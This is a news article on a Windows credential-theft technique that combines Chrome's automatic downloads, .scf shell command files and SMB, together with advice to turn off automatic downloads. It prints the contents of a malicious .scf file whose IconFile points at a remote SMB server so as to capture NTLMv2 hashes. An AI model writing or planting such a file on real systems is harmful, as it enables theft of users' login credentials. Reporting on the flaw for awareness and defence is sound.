Short Bytes: By combining a flaw in the working of SMB networking protocol and Windows .scf files, a security researcher has come up with a unique Windows hacking method. Just by accessing the folder with a specially crafted .scf file, a user will end up sharing the computer credentials via Chrome and SMB protocol. The users are advised to disable the automatic download feature in Google Chrome web browser. The researcher also expects that Google will soon address this issue.SMB, or Server Message Blocks, is a network file sharing protocol that’s implemented in Microsoft Windows. Using SMB protocol, an application can access files at a remote server and resources like printers, mailslots, etc. Attacks on Windows operating system via SMB file sharing is an already known issue, but it’s limited to local area networks. In a new development, a security researcher has come up with such an attack using Google Chrome.
This attack on Windows operating system works by exploiting Chrome’s behavior of automatically downloading the files that it deems safe. Chrome downloads the files to a preset location and doesn’t ask for the same. Let’s suppose a malicious file is downloaded on the system. In that case, the user would need to interact with the file to perform malicious actions. What if there are files that don’t need any interaction for such actions?
.SCF file + SMB Protocol + Google Chrome
One such file type is Windows Explorer Shell Command File (.scf files). It supports some Windows Explorer commands like showing desktop or opening a Windows Explorer window. A .scf file, if stored on disk, retrieves an icon file when it’s loaded in a Windows Explorer window.
Serbian security researcher Bosko Stankovic of DefenseCode combined these two concepts of SMB protocol and .scf file to devise a new type of hacking attack.
A .scf file can be used to trick Windows into authenticating a remote SMB server. This is how the contents of file will look like:[Shell] IconFile=\\22.214.171.124\icon
After a user downloads the file on system, it’s triggered as soon as download folder is opened to view the file. Please note that one doesn’t need to click/open this file; Windows File Explorer automatically attempts to load the icon.
The rest of the work is done by the remote SMB server which is set up by some notorious force. The server is ready to capture user’s username and NTLMv2 password hash, which can be cracked offline. The server can also be configured to relay this connection to some external service that needs such credentials.
Defeating Windows login credential theft
The security researcher advises the users to disable the automatic downloads in Google Chrome. To do so, one needs to open Show Advanced Settings in Settings. There, check the Ask where to save each file before downloading.
This change will force Google to ask for your permission before downloading a file. The researcher also hopes that Google Chrome will soon address this flaw.
Did you find this article on Windows hacking using Google Chrome, .SCF file, and SMB protocol useful? Don’t forget to share your views.